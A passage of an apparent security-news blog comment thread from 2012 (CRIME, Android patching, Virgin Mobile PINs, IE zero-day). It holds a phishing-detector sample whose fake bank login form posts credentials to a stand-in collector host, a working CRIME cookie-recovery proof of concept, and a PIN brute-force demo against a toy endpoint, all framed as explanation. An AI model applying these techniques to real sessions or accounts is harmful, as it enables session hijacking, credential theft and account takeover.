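SAMPLE_PAGE = (b"<html><body><h2>Bank login</h2>"
               b"<form action='https://collector.invalid/login' method='post'>"
               b"<input name='user'><input type='password' name='pass'><input type='submit'></form>"
               b"</body></html>")
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_PAGE).decode("ascii")


if __name__ == "__main__":
    report = assess_link(SAMPLE_DATA_URI)
    print(report, "-> suspicious" if is_suspicious(report) else "-> ok")
```

A mail or chat gateway has to expand shortened links before running this, since the whole point of the trick is that the data: URI hides behind a TinyURL; the form target is the one thing the crook cannot embed in the link, which is why it is worth logging.
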
  15. Tomi Engdahl says:

    Remember the importance of backups:

    Three-quarters of companies do not expect to survive a complete loss of their data.

    The fear is justified: of the companies that have faced a complete loss of data as a result of fire, earthquake or another event, 60 per cent had to go out of business within six months of the accident.

    However, every other company has protected its information so poorly that in a fire, for example, the information is likely to disappear altogether.

    “Backing up business-critical data is, however, easy to automate with today’s cloud service solutions, and restoring it after a loss is made easy,”

    Source: http://www.tietoviikko.fi/kaikki_uutiset/taydellinen+tietojen+menetys+olisi+katastrofi/a834549?s=r&wtm=tietoviikko/-04092012&

  16. Tomi Engdahl says:

    Networked Cars: Good For Safety, Bad For Privacy

    Once all our cars can talk to each other, what will they reveal about us?
    http://www.itworld.com/it-managementstrategy/292996/once-all-our-cars-can-talk-each-other-what-will-they-reveal-about-us

    In the future, cars will be networked, personalized, and connected to the cloud. The laws protecting personal data collected from these cars? Still largely road kill.

    IFA 2012 consumer electronics show in Berlin

    Bottom line? In a few short years our cars will be connected and talking to each other. They will also be able to collect vast amounts of data about who we are, where we go, and what we do. Some of these things will undoubtedly make our vehicles much safer; some may erase what little roadside privacy we have left.

    Using your smart phone, it will be able to connect to your data in the cloud

    The question then becomes, what happens to all this data?

    We’ve already seen what happens with cell phone data that’s collected by the wireless companies: Police made more than 1.3 million requests for location data last year alone, roughly two thirds of them in non-emergency situations

  17. Tomi Engdahl says:

    Cybercrime costs U.S. consumers $20.7 billion
    http://news.cnet.com/8301-1009_3-57506216-83/cybercrime-costs-u.s-consumers-$20.7-billion/

    U.S. consumers lost $20.7 billion to cybercrime over the past 12 months, with 71 million Americans falling victim to online bad guys, according to new research.

    Globally, losses resulting from cybercrime including malware attacks and phishing hit $110 billion between July 2011 and the end of July 2012, a yearly report by security company Symantec (.pdf) has found.

    According to the report, an estimated 556 million adults across the world had first-hand experience of cybercrime over the period
    The figure equates to nearly half of all adults online

  18. Tomi Engdahl says:

    SSL BEASTie boys develop follow-up ‘CRIME’ web attack
    http://www.theregister.co.uk/2012/09/07/https_sesh_hijack_attack/

    The security researchers who developed the infamous BEAST attack that broke SSL/TLS encryption are cooking up a new assault on the same crucial protocols.

    The new attack is capable of intercepting these HTTPS connections and hijacking them.

    The researchers warn that all versions of TLS/SSL – including TLS 1.2 which was resistant to their earlier BEAST (Browser Exploit Against SSL/TLS) technique – are at risk.

    “By running JavaScript code in the browser of the victim and sniffing HTTPS traffic, we can decrypt session cookies,” Rizzo told Threatpost. “We don’t need to use any browser plugin and we use JavaScript to make the attack faster, but in theory we could do it with static HTML.”

    Chrome and Firefox are both vulnerable to CRIME, but developers at Google and Mozilla have been given a heads up on the problem and are likely to have patches available within a few weeks.

  19. uk marriage visa test says:

    Thanks!! This was really helpful, I’m going to give it a try in addition to my private initial wp weblog web site.

  20. Tomi Engdahl says:

    It’s Easy To Steal Identities (Of Corporations)
    http://yro.slashdot.org/story/12/09/09/0536252/its-easy-to-steal-identities-of-corporations

    “Two lawyers in Houston were able to exploit business filing systems to seize control of dormant publicly traded corporations”

    “In many states, anyone can change important information about a publicly registered company — including the corporate officers or company contact information — without any confirmation that they have anything to do with the company in the first place.”

    Despite warnings, most states slow to confront corporate ID theft
    http://www.itworld.com/it-managementstrategy/293399/despite-warnings-most-states-slow-confront-corporate-id-theft

    Corporations are people, and lax business filing systems mean that stealing their identities has never been easier. Now some states are starting to take action.

    By manipulating business registration systems in Florida and Delaware as well as filing systems at organizations like NASDAQ and the SEC, the scammers took control of the companies and then obtained legitimate CUSIP numbers and stock trading symbols that were then used to push the worthless stock on unsuspecting investors. In all, the scheme raked in close to $100 million through bogus stock sales of 54 separate firms to gullible investors, mostly in the UK, before regulators and law enforcement got wise to it.

  21. Tomi Engdahl says:

    Exclusive: Insiders suspected in Saudi cyber attack
    http://www.reuters.com/article/2012/09/07/net-us-saudi-aramco-hack-idUSBRE8860CR20120907

    (Reuters) – One or more insiders with high-level access are suspected of assisting the hackers who damaged some 30,000 computers at Saudi Arabia’s national oil company last month, sources familiar with the company’s investigation say.

  22. Tomi Engdahl says:

    Five Tips to Avoid Malware in Mobile Apps
    http://www.pcworld.com/businesscenter/article/243782/five_tips_to_avoid_malware_in_mobile_apps.html

    Smartphones and tablets are evolving from niche luxury devices to mainstream consumer gadgets. As mobile devices become a ubiquitous part of the mainstream culture, malware developers are paying attention and are anxious to exploit the fertile new territory.

    Android is the low-hanging fruit because it combines the leading smartphone platform with an open ecosystem, and the ability to purchase apps from diverse, rogue app repositories. Other platforms seem inherently more secure, but are still not invulnerable.

    here are five things you should keep in mind when buying or downloading apps for your mobile devices:

    Be Aware
    Do Your Homework
    Check Your Sources
    Watch the Permissions
    Use Antimalware

  23. Tomi Engdahl says:

    White House circulating draft of executive order on cybersecurity
    http://thehill.com/blogs/hillicon-valley/technology/248079-white-house-circulating-draft-of-executive-order-on-cybersecurity

    The White House is circulating a draft of an executive order aimed at protecting the country from cyberattacks, The Hill has learned.

    The draft executive order would establish a voluntary program where companies operating critical infrastructure would elect to meet cybersecurity best practices and standards crafted, in part, by the government, according to two people familiar with the document.

    It’s also unclear whether the final product will get the president’s approval to move forward.

    White House counterterrorism adviser John Brennan first floated the idea of an executive order in a speech a few days after the Senate bill failed. He said the White House would consider taking action on the executive level to ensure key infrastructure such as the power grid, water supply and transportation networks are secure.

    DHS would be responsible for the overall management of the program, but the Commerce Department’s National Institute of Standards and Technology (NIST) would work with industry to help craft the framework for it. The agency would work with the private sector to develop cybersecurity guidelines and best practices.

    Reply
  24. Tomi Engdahl says:

    Majority of Mobile Malware Now Reliant On Toll Fraud
    http://yro.slashdot.org/story/12/09/10/0449239/majority-of-mobile-malware-now-reliant-on-toll-fraud

    “Spyware is no longer the primary concern with unwanted software on mobile devices. According to mobile security firm Lookout, most mobile malware performs ‘toll fraud’ — billing victims using premium SMS services.”

    Reply
  25. Tomi Engdahl says:

    Microsoft: As of October, 1024-Bit Certs Are the New Minimum
    http://it.slashdot.org/story/12/09/09/2324259/microsoft-as-of-october-1024-bit-certs-are-the-new-minimum

    “That warning comes as Microsoft prepares to release an automatic security update for Windows on Oct. 9, 2012, that will make longer key lengths mandatory for all digital certificates that touch Windows systems. … Internet Explorer won’t be able to access any website secured using an RSA digital certificate with a key length of less than 1,024 bits.”

    Reply
  26. Tomi Engdahl says:

    EXCLUSIVE: The real source of Apple device IDs leaked by Anonymous last week
    http://redtape.nbcnews.com/_news/2012/09/10/13781440-exclusive-the-real-source-of-apple-device-ids-leaked-by-anonymous-last-week

    A small Florida publishing company says the million-record database of Apple gadget identifiers released last week by the hacker group Anonymous was stolen from its servers two weeks ago.

    Anonymous’ accusations garnered attention because they suggested that the FBI was using the unique gadget identifiers — called UDIDs — to engage in high-level spying on American citizens via their iPhones, iPads, and iPod Touch devices. The FBI denied the claim.

    Both Apple and the FBI were quick to deny that they were conspiring to use UDIDs to track U.S. citizens; the FBI said it never had the data, and Apple said in a statement it had never given the data to the FBI.

    Paul DeHart is CEO of the Blue Toad publishing company. It provides private-label digital edition and app-building services to 6,000 different publishers, and serves 100 million page views each month.
    “That’s 100 percent confidence level, it’s our data,” DeHart said.

    “We’re pretty apologetic to the people who relied on us to keep this information secure.”

    There is debate about how dangerous the release of the UDID data is without the other information. DeHart said he knew of no practical malicious use for the leaked data.

    “Honestly, the UDID information by itself isn’t harmful, as far as we know,”

    Users who are concerned their UDID might be in the leaked list really don’t have any good options for dealing with the issue.

    “There’s nothing you can do. The UDID is permanently burned into the device,”

    Reply
  27. tomi says:

    Careful Who You Friend: Taliban Posing as ‘Attractive Women’ Online
    http://www.wired.com/dangerroom/2012/09/taliban-facebook/

    Tech-savvy Talibs have posed as pretty girls on Facebook to lure Australian troops into giving away military secrets. That’s one disturbing — but not totally surprising — conclusion of a recent Aussie government review of military social media usage.

    After all, this sort of thing has happened before.

    Reply
  28. Tomi Engdahl says:

    Anonymous: behind the masks of the cyber insurgents
    http://www.guardian.co.uk/technology/2012/sep/08/anonymous-behind-masks-cyber-insurgents

    Since 2008, the internet collective have hacked the CIA, the Sun newspaper, the Church of Scientology and a host of other large corporations, sparking a global police crackdown last year. But who and what are Anonymous? A radical new form of activism – or just bored teenagers?

    Reply
  29. Tomi Engdahl says:

    Verizon launches Mobile Security app for Android as antivirus companies target carriers
    http://www.theverge.com/2012/9/11/3314770/verizon-mobile-security-android-malware

    Verizon has introduced a McAfee-based Mobile Security app for its line of Android devices, with prices ranging from free to $1.99 a month. The carrier claims that devices are targets “of the same security and privacy threats that plague laptops and desktops,” and while consumers haven’t taken to antivirus software on mobile, companies like McAfee are striking deals directly with carriers.

    Android represents a new market for antivirus companies due to Google’s slow implementation of features such as device location and remote wiping — functionality that is sorely lacking from stock Android, but present for iPhone and iPad users.

    Reply
  30. Tomi Engdahl says:

    If an attacker wanted to mess society up completely, a few days of attacks against the shops would do it.

    IT researcher Professor Hannu H. Kari points out that messing up society does not require paralysing a nuclear power plant or cutting off the electricity. Interfering with mere network traffic is enough.

    - The real world and the cyber world are strongly attached to each other. We assume that information flows quickly. Interruption of the flow of information makes everyday life very difficult.

    As an example, Kari mentions the far-reaching logistics chains of retail. Stocks are small, and logistics is based on orders, and so on data transfers. If that becomes unstable, there is trouble.

    Pulling out the wires will not help against a network attack.

    If communication links with the outside are limited, ordinary citizens feel it. The defence can end up doing the aggressor’s work.

    The fact that many of society’s vital functions operate in closed systems improves security.

    Source: http://www.iltasanomat.fi/digi/art-1288498799235.html?pos=ok-nln

    Reply
  31. Tomi Engdahl says:

    Analysts: Shamoon oil biz malware flingers were ‘amateurs’
    Programming errors ahoy….
    http://www.theregister.co.uk/2012/09/12/shamoon_analysis/

    Fresh analysis of the Shamoon malware has concluded that its authors are more likely to be “skilled amateurs” rather than elite cyber-spies.

    Shamoon has been linked to recent high-profile malware outbreaks at Saudi Aramco and RasGas, Gulf-based oil and gas firms. Saudi Aramco lost its network for 10 days as a result of the attack, which affected 30,000 workstations. The outbreak was particularly nasty because Shamoon contains file-wiping functionality that can make infected machines inoperable as well as destroying data.

    Dmitry Tarakanov concludes that controversial features, such as planting the image of a burning US flag on compromised PCs, and (more damningly) coding errors mean that it’s more likely to be the work of amateurs than elite coders, such as the developers of either ZeuS or Stuxnet, for example.

    Reply
  32. Tomi Engdahl says:

    Finland faced yesterday a series of cyber-attacks:

    Helsingin Sanomat crashed under attack – the police blame a “technical fault”

    Both Helsingin Sanomat’s and Iltasanomat’s online services were down during the afternoon.

    The problems on the police website at the same time were, according to the police’s statement, due to a “technical failure”.

    Source: http://www.tietoviikko.fi/kaikki_uutiset/helsingin+sanomat+kaatui+hyokkaykseen++poliisi+quottekniseen+vikaanquot/a837509

    Coincidence or not? The police “hardware problem is likely related to the attack”

    “The attack was a wake-up call for Finnish society and business. Cyber-threats are already among the normal threats. We need to think about how to proceed if, say, the whole administration is under attack,”

    Yesterday’s attack had many strange features.

    “Our records indicate that the attack came quite centrally from Ukraine, which is also unusual. Generally, attacks are routed through different countries much more thoroughly,”

    The whole attack was strangely amateurish.

    As a strong personal opinion, however, he says that the ‘equipment failure’ at the police and border guard yesterday does not sound credible. “I do not believe in coincidences. A hardware problem that oddly takes place at the same time is probably related to the attack.”

    Stonesoft cyber security manager Jarno Limnell believes that yesterday’s cyber-attack was “knocking”, intended to test Finnish systems.

    Source: http://www.tietoviikko.fi/kaikki_uutiset/sattumaa+vai+ei+poliisin+quotlaitteistoongelmilla+on+todennakoisesti+yhteys+iskuunquot/a837949?s=r&wtm=tietoviikko/-12092012&

    Reply
  33. Tomi Engdahl says:

    Nude photos of Emma Watson: a dangerous thing to search for
    http://www.wired.co.uk/news/archive/2012-09/10/emma-watson-dangerous-nude

    As part of a frankly genius annual PR move, security firm McAfee has named Emma Watson the “most dangerous cyber celebrity”, based on the number of sites that serve up malware and viruses to unsuspecting web users who search for her.

    According to McAfee, searching for “Emma Watson” along with “nude pictures” or “fakes” is the best way to be lured onto malware-ridden celebrity websites. The same is true for Shakira, Megan Fox and Selena Gomez.

    “Due to the richness of the data and the high interaction, often times consumers forget the risks that they are taking by clicking on the links.”

    McAfee annually releases this list of “dangerous” celebrities

    Reply
  34. Tomi Engdahl says:

    Crack in Internet’s foundation of trust allows HTTPS session hijacking
    Attack dubbed CRIME breaks crypto used to prevent snooping of sensitive data.
    http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

    Researchers have identified a security weakness that allows them to hijack web browser sessions even when they’re protected by the HTTPS encryption that banks and ecommerce sites use to prevent snooping on sensitive transactions.

    The technique exploits web sessions protected by the Secure Sockets Layer and Transport Layer Security protocols when they use one of two data-compression schemes designed to reduce network congestion or the time it takes for webpages to load. Short for Compression Ratio Info-leak Made Easy, CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter.

    CRIME is the latest black eye for the widely used encryption protocols

    Representatives from Google, Mozilla, and Microsoft said their companies’ browsers weren’t vulnerable to CRIME attacks.

    Smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable.

    Even when a browser is vulnerable, an HTTPS session can only be hijacked when one of those browsers is used to connect to a site that supports SPDY or TLS compression.

    “I don’t think anyone realized that this enables an attack on HTTP over TLS, or that an attacker could learn the value of secret cookies sent over a TLS-encrypted connection,”

    Reply
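    The CRIME comment above describes the leak in words. What follows is an added example, written for this page and not code from the article or from the researchers, that shows the mechanism on a constructed HTTP request: the attacker injects guesses into the request path, the browser appends the cookie, and the attacker observes only the compressed length. The cookie value `7f3a9c2e`, the host name and the request template are made up; the example assumes the cookie name `sessionid=` is known, that the value is hexadecimal, and it forces fixed Huffman codes so that each probe has a deterministic cost.

```python
import zlib

# Constructed demo values (not from the article): the cookie the attacker is after
# and the fixed HTTP request in which the browser sends it.
SECRET_COOKIE = b"sessionid=7f3a9c2e"
KNOWN_PREFIX = b"sessionid="          # cookie names are public; the value is the secret
ALPHABET = b"0123456789abcdef"        # assumption: the value is hex


def compressed_length(attacker_controlled: bytes) -> int:
    """The side channel: how long the compressed request is on the wire.

    With TLS compression or SPDY the record length an eavesdropper sees is the
    DEFLATE output length plus a constant, so this number leaks.  The attacker
    controls only the request path; the cookie is appended by the browser.
    Fixed Huffman codes are forced (Z_FIXED) so each literal and match has a
    constant bit cost between probes; against dynamic Huffman codes a real
    attack needs more probes per guess, but the principle is the same.
    """
    request = (b"POST /" + attacker_controlled + b" HTTP/1.1\r\n"
               b"Host: example.com\r\n"
               b"Cookie: " + SECRET_COOKIE + b"\r\n\r\n")
    co = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return len(co.compress(request) + co.flush())


def probe_cost(guess: bytes) -> int:
    """Sum the length over eight probes padded by 0..7 nine-bit literals.

    A correct guess extends the back-reference into the cookie by one byte and
    saves 7 or 8 bits, which a single byte-granular length may round away.
    Shifting the bit alignment by one bit per probe makes the sum of the eight
    lengths strictly monotonic in the bit count, so the cheapest guess wins.
    """
    total = 0
    for k in range(8):
        # distinct bytes >= 144 cost 9 bits each under fixed Huffman and never form a match
        pad = bytes(range(0xC8, 0xC8 + k))
        total += compressed_length(guess + pad)
    return total


def recover_secret(length: int = 8) -> bytes:
    """Byte-at-a-time recovery: the candidate that compresses best is appended."""
    recovered = b""
    for _ in range(length):
        costs = {c: probe_cost(KNOWN_PREFIX + recovered + bytes([c])) for c in ALPHABET}
        recovered += bytes([min(costs, key=costs.get)])
    return recovered


if __name__ == "__main__":
    print(recover_secret())   # -> b'7f3a9c2e'
```

    Each correct byte extends the DEFLATE back-reference and saves roughly one byte of output; the padded probes in `probe_cost` turn that into a strict ordering, which is why the loop recovers the whole value without ever seeing plaintext. Turning off TLS compression and SPDY header compression, as the browser vendors did, removes the signal entirely.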
  35. Tomi Engdahl says:

    ‘Over half’ of Android devices have unpatched holes
    Fix is up to your carrier, Google, mobo maker – just about everyone
    http://www.theregister.co.uk/2012/09/14/duo_says_android_security_nightmare/

    Duo Security is claiming that “over half” of Android devices have unpatched vulnerabilities.

    The company’s Jon Oberheide says in this blog post that the results come from the first slew of users of the company’s X-Ray Android vulnerability scanner.

    Android patching is a pain in the neck, involving as it does the complex ecosystem of Google, device makers and carriers. The easiest way to get an up-to-date version of Android is to buy a new device.

    Reply
  36. Tomi Engdahl says:

    Huawei, ZTE clash with US over national security
    How big a risk can it be given US telco kit-makers do their manufacturing in China?
    http://www.theregister.co.uk/2012/09/14/huawei_zte_congress_hearing/

    Chinese telecoms kit makers Huawei and ZTE failed to allay the long standing national security concerns of Congressmen surrounding their access to the US market, at a high profile hearing in Washington on Thursday.

    The two have been in the spotlight for almost a year as the US House of Representatives Select Committee on Intelligence investigated claims that the two are linked to the Chinese military.

    “We respectfully suggest that the Committee’s focus on ZTE, to the exclusion of the Western telecom vendors, addresses the overall issue of risk so narrowly that it omits from the Committee’s inquiry the suppliers of the vast majority of equipment used in the US market,” said ZTE SVP Zhu Jinyun.

    “It is strange the internal corporate documents of purportedly private sector firms are considered classified secrets in China. This fact alone gives us a reason to question their independence.”

    Rightly or wrongly, the continued intelligence linking persistent cyber attacks on US organisations originating from China will likely keep US politicians from softening their stance, despite the large sums of money both firms are already ploughing into the US economy.

    Reply
  37. Tomi Engdahl says:

    Blackhole 2: Crimeware kit gets stealthier, Windows 8 support
    Malware-flinging tool to target mobiles too
    http://www.theregister.co.uk/2012/09/13/blackhole_exploit_kit_revamp/

    Cybercrooks have unveiled a new version of the Blackhole exploit kit. Version 2 of Blackhole is expressly designed to better avoid security defences. Support for Windows 8 and mobile devices is another key feature, a sign of the changing target platforms for malware-based cyberscams.

    Rental prices run from $50 a day while leasing the software for a year costs around $1,500.

    The Blackhole exploit kit has been around for about two years, during which time it has become the preferred tool for running drive-by download attacks.

    The end result is that an unpatched Windows PC becomes infected with a banking Trojan, fake anti-virus or botnet agent after visiting a compromised website.

    Reply
  38. Tomi Engdahl says:

    Intel to take felon-foiling tech to phones, slates
    Lock up your datas
    http://www.reghardware.com/2012/09/13/idf_2012_intel_to_bring_anti_theft_technology_to_tablets_and_phones/

    IDF 2012: Intel has confirmed that it will bring its Anti-theft Technology (AT), currently being pitched at Ultrabooks, to Atom-based smartphones and tablets.

    The timeframe for bringing AT to such devices is unclear, but it is definitely on the company’s roadmap.

    Intel is mandating the tech for Ultrabooks.

    AT utilises pre-BIOS hardware to contact Intel-trusted third-party servers and determine whether the Ultrabook it is fitted to has been lost or stolen. Periodic checks when the machine boots or when it comes out of deep sleep verify it is in the hands of its owner.

    Intel has a bright sticker to warn.

    Reply
  39. Tomi Engdahl says:

    Early Results from X-Ray: Over 50% of Android Devices are Vulnerable
    https://blog.duosecurity.com/2012/09/early-results-from-x-ray-over-50-of-android-devices-are-vulnerable/

    Since we launched X-Ray, we’ve already collected results from over 20,000 Android devices worldwide. Based on these initial results, we estimate that over half of Android devices worldwide have unpatched vulnerabilities that could be exploited by a malicious app or adversary.

    Yes, it’s a scary number, but it exemplifies how important expedient patching is to mobile security and how poorly the industry (carriers, device manufacturers, etc) has performed thus far.

    As carriers are very conservative in rolling out patches to fix vulnerabilities in the Android platform, users’ mobile devices often remain vulnerable for months and even years.

    Reply
  40. Tomi Engdahl says:

    According to international KPMG’s Cyber ​​Vulnerability Index 2012 survey, most of the Forbes 2000 companies (75 percent) are leaking out information through network attacks.

    Source: http://www.tietokone.fi/uutiset/kolme_neljasta_yrityksesta_vuotaa_tietoja

    Reply
  41. Tomi Engdahl says:

    With the wave of a hand, Intel wants to do away with passwords
    http://www.reuters.com/article/2012/09/13/us-intel-passwords-idUSBRE88C1A120120913

    Passwords for online banking, social networks and email could be replaced with the wave of a hand if prototype technology developed by Intel makes it to tablets and laptops.

    “The problem with passwords — we use too many of them, their rules are complex, and they differ for different websites,” Sridhar Iyengar, director of security research at Intel Labs, said at the annual Intel Developer Forum in San Francisco on Thursday. “There is a way out of it, and biometrics is an option.”

    Reply
  42. Tomi Engdahl says:

    Firmware maker says it could enable dual-boot Windows RT, Android devices
    http://www.pcworld.com/article/262306/firmware_maker_says_it_could_enable_dualboot_windows_rt_android_devices.html#tk.rss_news

    Tablets and PCs could come with a dual-boot capability to load either Microsoft’s upcoming Windows RT or Android, but device makers will need to be interested in building such devices in order for it to make its way to the public, firmware company Insyde Software said on Thursday.

    The company can provide the firmware and tools based on standard UEFI boot specifications for the dual-boot Windows RT and Android devices, and the company has seen interest from some device and chip makers.

    Reply
  43. Tomi Engdahl says:

    Users told: Get rid of Internet Explorer (again)
    It’s more like an exploit than a browser
    http://www.theregister.co.uk/2012/09/17/yet_another_explorer_zero_day/

    Internet Explorer users have been told to ditch the application and switch to another browser, pronto.

    The warning comes from Rapid7, which describes a hole that’s exploitable by visiting a malicious Website (and, of course, in the world of Twitter and shortened URLs, it’s so much easier to get users to visit such sites).

    Visiting a malicious site gives the attacker the same privileges as the current user.

    Although the published exploit targets XP, Rapid7 says the attack works on IE 7 through 9 running on XP, Vista and Windows 7.

    Romang claims the exploit was created by the same group – Nitro – that recently released a Java zero-day into the wild.

    This is one of the few times that a vulnerability has been successfully exploited across all the production shipping versions of the browser and OS.

    Reply
  44. Tomi Engdahl says:

    In Internet Explorer, a serious risk – protect yourself against this

    When a surfer ends up on a website that spreads viruses, the site owner can take over the computer used for surfing.

    There is no fix for this yet.

    Microsoft’s recommendations:
    Install the Enhanced Mitigation Experience Toolkit v3.0.
    Set IE’s security level for the intranet and Internet zones to “high”.

    Source: http://www.iltasanomat.fi/digi/art-1288500272218.html

    Enhanced Mitigation Experience Toolkit v3.0
    A toolkit for deploying and configuring security mitigation technologies
    http://www.microsoft.com/en-us/download/details.aspx?id=29851

    Critical zero-day bug in Internet Explorer under active attack
    Remotely triggered vuln can affect a wide variety of IE and Windows versions.
    http://arstechnica.com/security/2012/09/critical-zero-day-bug-in-microsoft-internet-explorer/

    Reply
  45. Tomi Engdahl says:

    DDoS crooks: Do you want us to blitz those phone lines too?
    Miscreants offer to down mobe and fixed line services for $20 a day
    http://www.theregister.co.uk/2012/08/02/telecoms_ddos/

    Cybercrooks are now offering to launch cyberattacks against telecom services, with prices starting at just $20 a day.

    Distributed denial of service attacks against websites or web services have been going on for many years. Attacks that swamp telecoms services are a much more recent innovation, first starting around 2010.

    Attacks on telecom lines are launched using attack scripts on compromised Asterisk (software PBX) servers.

    Default credentials are one of the main security weaknesses used by hackers to initially gain access to VoIP/PBX systems prior to launching voice mail phishing scams or running SIP-based flooding attacks, say researchers.

    Telecoms-focused denial of service attacks are driven by the same sorts of motives as a DDoS on a website.

    “Typical motives can be anything from revenge, extortion, political/ideological, and distraction from a larger set of financial crimes,” a blog post by Curt Wilson of DDoS mitigation experts Arbor Networks explains.

    Poorly configured VoIP systems can be brought down even by something as simple as a port scan, Wilson notes.

    Reply
  46. Tomi Engdahl says:

    Virgin Mobile fails web security 101, leaves six million subscriber accounts wide open
    http://kev.inburke.com/kevin/open-season-on-virgin-mobile-customer-data/

    Anyone who knows your Virgin Mobile USA phone number can:

    see who you’ve been calling and texting,
    change the handset associated with your number,
    change your address, your email address, or your password,
    purchase a handset on your behalf

    There is no way to defend against this attack.

    I reported the issue to Virgin Mobile USA a month ago and they have not taken any action, nor informed me of any concrete steps to fix the problem, so I am disclosing this issue publicly.

    Virgin Mobile forces you to use your phone number as your username, and a 6-digit number as your password. This means that there are only one million possible passwords you can choose.

    This is horribly insecure

    It is trivial to write a program that checks all million possible password combinations, easily determining anyone’s PIN inside of one day. I verified this by writing a script to “brute force” the PIN number of my own account.

    Virgin Mobile Shrugs as Coder Warns Accounts Are Easily Hijacked
    http://www.wired.com/threatlevel/2012/09/virgin-mobile/

    Burke, who works as a developer at Twilio, says he’s used to looking at security issues thanks to his day job, and noticed how weak the authentication system was. Once he proved to himself that anyone could bust in with a few lines of code, he contacted the company.

    “I tried to escalate it following responsible disclosure principles,” Burke said. After eventually finding someone who understood the problem, Burke repeatedly followed up, only to eventually be told not to expect any change.

    He then decided to go public so that people would know they were at risk — though there’s nothing users can do to protect themselves, except not use Virgin Mobile.

    The fixes, according to Burke, start with allowing more complex passwords and locking down accounts after a few failed attempts.

    While Virgin Mobile may consider its insecure system to be “standard industry practice,” Twitter ended up signing a 20-year consent decree with federal regulators over its shoddy security practices. One key element in the FTC’s action? Twitter didn’t prevent rapid guessing of passwords.

    Reply
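    To make the point of the Virgin Mobile post concrete, here is an added example (my own code, not Burke’s script and not Virgin Mobile’s system) with a toy login endpoint in two configurations: the “wide open” one described above, where the username is the phone number, the password is a six-digit PIN and failures are never counted, and the hardened one Burke asks for, which locks the account after a handful of failures. The phone number and PIN are constructed; a real service would also store the PIN hashed and rate-limit per source address, which this toy omits.

```python
import hmac
import itertools
from typing import Dict, Optional, Tuple

# Constructed demo data: one subscriber, identified by phone number, with a 6-digit PIN.
ACCOUNTS: Dict[str, str] = {"5551234567": "120394"}


class PinLogin:
    """Toy account-login endpoint.

    max_failures=None mirrors the behaviour described in the post: unlimited
    guesses against a one-million-value password space.  A small integer adds
    the lockout Burke recommends.
    """

    def __init__(self, accounts: Dict[str, str], max_failures: Optional[int] = None):
        self._pins = dict(accounts)              # real systems store a hash, not the PIN
        self._failures = {n: 0 for n in accounts}
        self.max_failures = max_failures

    def is_locked(self, number: str) -> bool:
        return self.max_failures is not None and self._failures.get(number, 0) >= self.max_failures

    def login(self, number: str, pin: str) -> bool:
        if number not in self._pins or self.is_locked(number):
            return False                         # unknown or locked: no information, no counter change
        if hmac.compare_digest(self._pins[number], pin):
            self._failures[number] = 0           # successful login resets the failure counter
            return True
        self._failures[number] += 1
        return False


def brute_force(endpoint: PinLogin, number: str) -> Tuple[Optional[str], int]:
    """Try every 6-digit PIN in order 000000..999999.

    Returns (pin, attempts) on success, (None, attempts) if the account locked
    first, and (None, 10**6) if the whole space was exhausted.
    """
    for attempts, digits in enumerate(itertools.product("0123456789", repeat=6), start=1):
        pin = "".join(digits)
        if endpoint.login(number, pin):
            return pin, attempts
        if endpoint.is_locked(number):
            return None, attempts
    return None, 10 ** 6


def worst_case_seconds(guesses_per_second: float, space: int = 10 ** 6) -> float:
    """How long exhausting the PIN space takes at a given guess rate."""
    return space / guesses_per_second


if __name__ == "__main__":
    print(brute_force(PinLogin(ACCOUNTS), "5551234567"))                # ('120394', 120395)
    print(brute_force(PinLogin(ACCOUNTS, max_failures=5), "5551234567"))  # (None, 5)
    print(worst_case_seconds(20))                                          # 50000.0, i.e. under a day
```

    With no lockout the attacker walks the space and lands on the PIN after as many guesses as its numeric value, so every account falls within a day at a modest request rate; with a lockout of five the attacker gets five guesses per account and a success probability of five in a million, after which the account is locked and the owner is alerted. Lockout alone invites denial of service against the legitimate user, so in practice it is paired with per-source throttling and a CAPTCHA or out-of-band unlock.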
  47. Tomi Engdahl says:

    Asian hackers p0wned by Eastern European rivals
    Former Soviet bloc countries hack hardest, says former presidential security man
    http://www.theregister.co.uk/2012/09/20/eastern_european_hackers_beat_asia/

    Cyber criminals from Eastern Europe present a more sophisticated information security threat to Western firms than their rivals in East Asia, according to a surprising new assessment of the global threat landscape by a former White House cyber security advisor.

    Peter the Great vs. Sun Tzu is a new report from Tom Kellerman, cyber security VP at Trend Micro

    In it, he reveals seven reasons why the researchers at Trend Micro believe “hackers from the former Soviet bloc are a more sophisticated and clandestine threat than their more well-known East Asian counterparts”.

    Eastern European hackers are organised in small, independent mercenary units which live or die by the quality of their work and are motivated solely by profit, meaning they’re capable of more precise and focused attacks and aim to steal credentials that can be sold on the black market.

    The report likens East Asian cyber criminals, on the other hand, to “cyber foot soldiers” tasked with gathering information for their commanders.

    Reply
  48. Tomi Engdahl says:

    PIN analysis
    “All credit card PIN numbers in the World leaked”
    http://www.datagenetics.com/blog/september32012/index.html

    There are 10,000 possible combinations that the digits 0-9 can be arranged to form a 4-digit pin code. Out of these ten thousand codes, which is the least commonly used?

    The most popular password is 1234 …
    … nearly 11% of the 3.4 million passwords are 1234 !!!

    The next most popular 4-digit PIN in use is 1111, with over 6% of passwords being this.

    In third place is 0000 with almost 2%.

    OK, we’ve investigated the most frequently used PINs and found they tend to be predictable and easy to remember.

    Reply
  49. Tomi says:

    The Man Who Hacked the Bank of France
    http://it.slashdot.org/story/12/09/20/1729224/the-man-who-hacked-the-bank-of-france

    “In 2008 a Skype user looking for cheap rate gateway numbers found himself connected to the Bank of France where he was asked for a password. He typed 1 2 3 4 5 6 and found himself connected to their computer system.”

    “By entering a random number, then simply dialing the code 1, 2, 3, 4, 5, 6, he got very easily into the debt service of the Bank of France, without even knowing where he was, because no message told him where he was.”

    The intrusion blocked the service for 48 hours, and this became the subject of a two-year investigation, which the lawyer called “unbelievable”.

    Reply